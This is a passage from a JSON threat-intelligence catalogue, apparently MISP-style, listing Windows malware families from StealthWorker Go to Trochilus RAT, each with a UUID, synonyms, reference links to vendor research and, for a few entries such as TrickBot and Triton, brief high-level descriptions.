"https://malpedia.caad.fkie.fraunhofer.de/details/win.stealthworker", "https://blog.malwarebytes.com/threat-analysis/2019/02/new-golang-brute-forcer-discovered-amid-rise-e-commerce-attacks/" ], "synonyms": [], "type": [] }, "uuid": "d1c5a299-c072-44b5-be31-d03853bca5ea", "value": "StealthWorker Go" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stegoloader", "https://www.secureworks.com/research/stegoloader-a-stealthy-information-stealer" ], "synonyms": [], "type": [] }, "uuid": "aea21616-061d-4177-9512-8887853394ed", "value": "StegoLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stinger" ], "synonyms": [], "type": [] }, "uuid": "82ab5235-a71e-4692-a08c-8db337d8b53a", "value": "Stinger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stop", "https://securelist.com/keypass-ransomware/87412/", "https://www.bleepingcomputer.com/news/security/djvu-ransomware-spreading-new-tro-variant-through-cracks-and-adware-bundles/" ], "synonyms": [ "Djvu", "KeyPass" ], "type": [] }, "uuid": "447e5d7d-dd23-43b3-8cbc-b835498a49dd", "value": "STOP Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stration" ], "synonyms": [], "type": [] }, "uuid": "0439c5ec-306e-4473-84f7-50bdb5539fc2", "value": "Stration" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint", "https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/", "https://www.bleepingcomputer.com/news/security/stresspaint-malware-steals-facebook-credentials-and-session-cookies/", "https://security.radware.com/malware/stresspaint-malware-targeting-facebook-credentials/", "https://blog.radware.com/security/2018/04/stresspaint-malware-campaign-targeting-facebook-credentials/" ], "synonyms": [], "type": [] }, "uuid": "00dedcea-4f87-4b6d-b12d-7749281b1366", "value": "Stresspaint" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity", "https://twitter.com/physicaldrive0/status/786293008278970368", "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/", "https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/", "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/" ], "synonyms": [], "type": [] }, "uuid": "da2969f2-01e9-4ca8-b2f3-5fc9a9891d57", "value": "StrongPity" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet", "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html", "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf" ], "synonyms": [], "type": [] }, "uuid": "6ad84f52-0025-4a9d-861a-65c870f47988", "value": "Stuxnet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunorcal", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/", "http://pwc.blogs.com/cyber_security_updates/2016/03/index.html" ], "synonyms": [], "type": [] }, "uuid": "a51b82ba-7e32-4a8e-b5d0-8d0441bdcce4", "value": "SunOrcal" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox", "https://www.symantec.com/connect/blogs/trojanbayrob-strikes-again-1", "https://media.blackhat.com/us-13/US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdf", "https://www.justice.gov/opa/pr/two-romanian-cybercriminals-convicted-all-21-counts-relating-infecting-over-400000-victim", "https://www.symantec.com/connect/blogs/bayrob-three-suspects-extradited-face-charges-us" ], "synonyms": [ "Bayrob", "Nivdort" ], "type": [] }, "uuid": "dd9939a4-df45-4c7c-8a8d-83b40766aacd", "value": "SuppoBox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.swift", "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" ], "synonyms": [], "type": [] }, "uuid": "8420653b-1412-45a1-9a2d-6aa9b9eaf906", "value": "Swift?" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sword", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "2112870f-06f1-44a9-9c43-6cc4fb90e295", "value": "Sword" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot", "https://www.alienvault.com/blogs/labs-research/sykipot-is-back", "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/", "https://community.rsa.com/thread/185437", "https://www.symantec.com/connect/blogs/sykipot-attacks" ], "synonyms": [ "getkys" ], "type": [] }, "uuid": "99ffeb75-8d21-43a2-b5f7-f58bcbac2228", "value": "sykipot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synack", "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/" ], "synonyms": [], "type": [] }, "uuid": "a396a0bb-6dc5-424a-bdbd-f8ba808ca2c2", "value": "SynAck" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synccrypt", "https://www.bleepingcomputer.com/news/security/synccrypt-ransomware-hides-inside-jpg-files-appends-kk-extension/" ], "synonyms": [], "type": [] }, "uuid": "e717a26d-17aa-4cd7-88de-dc75aa365232", "value": "SyncCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synflooder", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "d327b4d9-e1c8-4c71-b9fe-775d1607e7d4", "value": "SynFlooder" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synth_loader" ], "synonyms": [], "type": [] }, "uuid": "ffd74637-b518-4622-939b-c0669a81f3a9", "value": "Synth Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "2ae57534-6aac-4025-8d93-888dab112b45", "value": "Sys10" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon", "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", "http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/" ], "synonyms": [], "type": [] }, "uuid": "4f079a71-bb1b-47b6-a6d0-26a37cd8a3a6", "value": "Syscon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysget", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" ], "synonyms": [], "type": [] }, "uuid": "a4b9c526-42d0-4de9-ab8e-e78f99655d11", "value": "SysGet" }, { "description": "Sysraw stealer got its name because at some point, it was started as \"ZSysRaw\\sysraw.exe\". PDB strings suggest the name \"Clipsa\" though. First stage connects to /WPCoreLog/, the second one to /WPSecurity/. Its behavior suggest that it is an info stealer. It creates a rather large amount of files in a subdirectory (e.g. data) named \"1?[-+].dat\" and POSTs them.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysraw_stealer", "https://zerophagemalware.com/2017/09/21/rig-ek-via-rulan-drops-an-infostealer/" ], "synonyms": [ "Clipsa" ], "type": [] }, "uuid": "f90e9fb9-d60d-415e-9f7f-786ee45f6947", "value": "Sysraw Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysscan" ], "synonyms": [], "type": [] }, "uuid": "7007b268-f6f4-4a01-9184-fc2334461c38", "value": "SysScan" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.szribi", "https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel", "https://www.fireeye.com/blog/threat-research/2008/11/technical-details-of-srizbis-domain-generation-algorithm.html", "https://www.secureworks.com/research/srizbi" ], "synonyms": [], "type": [] }, "uuid": "66b1094f-7779-43ad-a32b-a9414babcc76", "value": "Szribi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tabmsgsql", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "48aa9c41-f420-418b-975c-1fb6e2a91145", "value": "TabMsgSQL" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor", "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf", "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html", "https://www.nttsecurity.com/docs/librariesprovider3/resources/taidoor%E3%82%92%E7%94%A8%E3%81%84%E3%81%9F%E6%A8%99%E7%9A%84%E5%9E%8B%E6%94%BB%E6%92%83%E8%A7%A3%E6%9E%90%E3%83%AC%E3%83%9D%E3%83%BC%E3%83%88_v1" ], "synonyms": [ "simbot" ], "type": [] }, "uuid": "94323b32-9566-450b-8480-5f9f53b57948", "value": "taidoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.taleret", "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", "http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html" ], "synonyms": [], "type": [] }, "uuid": "b0467c03-824f-4071-8668-f056110d2a50", "value": "Taleret" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tandfuy" ], "synonyms": [], "type": [] }, "uuid": "88ff523e-206b-4918-8c93-e2829427eef2", "value": "Tandfuy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux", "https://securelist.com/files/2014/11/darkhotel_kl_07.11.pdf" ], "synonyms": [], "type": [] }, "uuid": "71e77349-98f5-49c6-bff7-6ed3b3d79410", "value": "Tapaoux" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tarsip", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "ea6a62b2-db33-4d60-9823-5117c20b6457", "value": "Tarsip" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdiscoverer", "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf" ], "synonyms": [], "type": [] }, "uuid": "bbbf4786-1aba-40ac-8ad7-c9d8c66197a8", "value": "tDiscoverer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdtess", "http://www.clearskysec.com/tulip/" ], "synonyms": [], "type": [] }, "uuid": "99d83ee8-6870-4af2-a3c8-cf86baff7cb3", "value": "TDTESS" }, { "description": "Recently, Check Point researchers spotted a targeted attack against officials within government finance authorities and representatives in several embassies in Europe. The attack, which starts with a malicious attachment disguised as a top secret US document, weaponizes TeamViewer, the popular remote access and desktop sharing software, to gain full control of the infected computer.\r\nThis is achieved by sideloading another DLL among the legit TeamViewer.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teambot", "https://research.checkpoint.com/finteam-trojanized-teamviewer-against-government-targets/" ], "synonyms": [ "FINTEAM" ], "type": [] }, "uuid": "045469d0-5bb2-4ed9-9ee2-a0a08f437433", "value": "TeamBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tefosteal", "https://twitter.com/WDSecurity/status/1105990738993504256" ], "synonyms": [], "type": [] }, "uuid": "aaa05037-aee1-4353-ace1-43ae0f558091", "value": "TefoSteal" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.telebot", "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" ], "synonyms": [], "type": [] }, "uuid": "06e0d676-8160-4b65-b6ea-d7634c962809", "value": "TeleBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teledoor", "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html", "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/" ], "synonyms": [], "type": [] }, "uuid": "b71f1656-975a-4daa-8109-00c30fd20410", "value": "TeleDoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tempedreve" ], "synonyms": [], "type": [] }, "uuid": "26b2c2c0-036e-4e3a-a465-71a391046b74", "value": "Tempedreve" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.terminator_rat", "https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf", "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html", "https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf", "https://documents.trendmicro.com/assets/wp/wp-fakem-rat.pdf" ], "synonyms": [ "Fakem RAT" ], "type": [] }, "uuid": "b127028b-ecb1-434b-abea-e4df3ca458b9", "value": "Terminator RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.termite", "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/", "https://www.alienvault.com/blogs/labs-research/internet-of-termites" ], "synonyms": [], "type": [] }, "uuid": "c0801a29-ecc4-449b-9a1b-9d2dbde1995d", "value": "Termite" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt", "https://blogs.cisco.com/security/talos/teslacrypt", "https://securelist.com/teslacrypt-2-0-disguised-as-cryptowall/71371/", "https://success.trendmicro.com/solution/1113900-emerging-threat-on-ransom-cryptesla", "https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/", "https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/", "https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf", "https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/", "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack" ], "synonyms": [ "cryptesla" ], "type": [] }, "uuid": "bd79d5be-5c2f-45c1-ac99-0e755a61abad", "value": "TeslaCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos", "https://www.proofpoint.com//us/threat-insight/post/Death-Comes-Calling-Thanatos-Alphabot-Trojan-Hits-Market" ], "synonyms": [ "Alphabot" ], "type": [] }, "uuid": "24fabbe0-27a2-4c93-a6a6-c14767efaa25", "value": "Thanatos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos_ransom", "https://blog.talosintelligence.com/2018/06/ThanatosDecryptor.html", "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-is-first-to-use-bitcoin-cash-messes-up-encryption/", "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-decryptor-released-by-the-cisco-talos-group/" ], "synonyms": [], "type": [] }, "uuid": "0884cf65-564e-4ee2-b4e5-b73f8bbd6a34", "value": "Thanatos Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.threebyte", "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" ], "synonyms": [], "type": [] }, "uuid": "d1752bcb-d9cb-4b4b-81f0-0658d76b4ce4", "value": "ThreeByte" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.thumbthief", "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" ], "synonyms": [], "type": [] }, "uuid": "1df3b58a-e5d2-4d2a-869c-8d4532cc9f52", "value": "ThumbThief" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunker" ], "synonyms": [], "type": [] }, "uuid": "e55dcdec-0365-4ee0-96f8-7021183845a3", "value": "Thunker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tidepool", "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", "http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/" ], "synonyms": [], "type": [] }, "uuid": "8e7cdcc2-37e1-4927-9c2d-eeb3050c4fca", "value": "Tidepool" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba", "https://labsblog.f-secure.com/2016/01/18/analyzing-tinba-configuration-data/", "http://www.theregister.co.uk/2012/06/04/small_banking_trojan/", "https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/", "https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/", "http://contagiodump.blogspot.com/2012/06/amazon.html", "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf", "https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant", "http://garage4hackers.com/entry.php?b=3086", "http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html", "http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/" ], "synonyms": [ "Illi", "TinyBanker", "Zusy" ], "type": [] }, "uuid": "5eee35b6-bd21-4b67-b198-e9320fcf2c88", "value": "Tinba" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader", "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak", "https://www.fidelissecurity.com/threatgeek/2017/07/deconstructing-tinyloader-0", "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software" ], "synonyms": [], "type": [] }, "uuid": "f7c26ca7-0a7b-41b8-ad55-06625be10144", "value": "TinyLoader" }, { "description": "TinyMet is a meterpreter stager.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinymet", "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/" ], "synonyms": [ "TiniMet" ], "type": [] }, "uuid": "075c6fa0-e670-4fe1-be8b-b8b13714cb58", "value": "TinyMet" }, { "description": "TinyNuke (aka Nuclear Bot) is a fully-fledged banking trojan including HiddenDesktop/VNC server and a reverse socks4 server. It was for sale on underground marketplaces for $2500 in 2016. The program's author claimed the malware was written from scratch, but that it functioned similarly to the ZeuS banking trojan in that it could steal passwords and inject arbitrary content when victims visited banking Web sites. However, he then proceeded to destroy his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on Github. XBot is an off-spring of TinyNuke, but very similar to its ancestor.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4596", "https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702", "https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet", "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html", "https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/", "https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/", "https://krebsonsecurity.com/tag/nuclear-bot/", "https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/" ], "synonyms": [ "MicroBankingTrojan", "Nuclear Bot", "NukeBot", "Xbot" ], "type": [] }, "uuid": "5a78ec38-8b93-4dde-a99e-0c9b77674838", "value": "TinyNuke" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinytyphon", "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" ], "synonyms": [], "type": [] }, "uuid": "d2414f4a-1eda-4d80-84d3-ed130ca14e3c", "value": "TinyTyphon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyzbot", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "b933634f-81d0-41ef-bf2f-ea646fc9e59c", "value": "TinyZbot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiop" ], "synonyms": [], "type": [] }, "uuid": "c34091df-0df2-4ef6-bf69-c67eb711f6d8", "value": "Tiop" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee", "https://www.cert.pl/en/news/single/tofsee-en/", "https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/", "https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/" ], "synonyms": [ "Gheg" ], "type": [] }, "uuid": "53e617fc-d71e-437b-a1a1-68b815d1ff49", "value": "Tofsee" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker", "http://www.isightpartners.com/2014/08/analysis-torrentlocker-new-strain-malware-using-components-cryptolocker-cryptowall/", "http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/" ], "synonyms": [], "type": [] }, "uuid": "7f6cd579-b021-4896-80da-fcc07c35c8b2", "value": "TorrentLocker" }, { "description": "tRat is a modular RAT written in Delphi and has appeared in campaigns in September and October of 2018.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trat", "https://www.proofpoint.com/us/threat-insight/post/trat-new-modular-rat-appears-multiple-email-campaigns" ], "synonyms": [], "type": [] }, "uuid": "b9e6e4bd-57e8-44e7-853c-8dcb83c26079", "value": "tRat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter", "https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html", "https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/", "http://adelmas.com/blog/treasurehunter.php" ], "synonyms": [ "huntpos" ], "type": [] }, "uuid": "f9d85edd-caa9-4134-9396-4575e70b10f2", "value": "TreasureHunter" }, { "description": "A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.\r\n\r\n- Q4 2016 - Detected in wild\r\nOct 2016 - 1st Report\r\nJan 2018 - Use XMRIG (Monero) miner\r\nFeb 2018 - Theft Bitcoin\r\nMar 2018 - Unfinished ransomware module\r\n\r\nInfection Vector\r\n1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot\r\n2. Phish > Attached MS Office > Marco Enabled > Downloader > Trickbot\r\n3. Phish > Attached MS Office > Marco enabled > Trickbot installed", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot", "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware", "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/", "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/", "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module", "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre", "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/", "http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html", "https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/", "https://www.youtube.com/watch?v=KMcSAlS9zGE", "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/", "https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/", "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html", "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/", "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader", "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", "https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/", "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works", "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/", "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms", "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412", "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot", "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html", "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/", "https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html", "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf", "https://blogs.forcepoint.com/security-labs/trickbot-spread-necurs-botnet-adds-nordic-countries-its-targets", "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot", "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", "http://www.malware-traffic-analysis.net/2018/02/01/", "https://www.cert.pl/en/news/single/detricking-trickbot-loader/", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/evolving-trickbot-adds-detection-evasion-and-screen-locking-features", "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/", "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html", "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-3-core", "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html", "https://www.youtube.com/watch?v=EdchPEHnohw", "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html", "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", "https://www.vkremez.com/2018/11/lets-learn-introducing-latest-trickbot.html", "https://www.youtube.com/watch?v=lTywPmZEU1A", "https://qmemcpy.github.io/post/reverse-engineering-malware-trickbot-part-1-packer", "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf", "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/" ], "synonyms": [ "TheTrick", "TrickLoader", "Trickster" ], "type": [] }, "uuid": "c824813c-9c79-4917-829a-af72529e8329", "value": "TrickBot" }, { "description": "Malware attacking commonly used in Industrial Control Systems (ICS) Triconex Safety Instrumented System (SIS) controllers.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.triton", "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware", "https://dragos.com/blog/trisis/TRISIS-01.pdf", "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN", "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html", "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf" ], "synonyms": [ "HatMan", "Trisis" ], "type": [] }, "uuid": "79606b2b-72f0-41e3-8116-1093c1f94b15", "value": "Triton" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat", "https://github.com/5loyd/trochilus/", "https://asert.arbornetworks.com/uncovering-the-seven-pointed-dagger/", "https://github.com/m0n0ph1/malware-1/tree/master/Trochilus", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf" ], "synonyms": 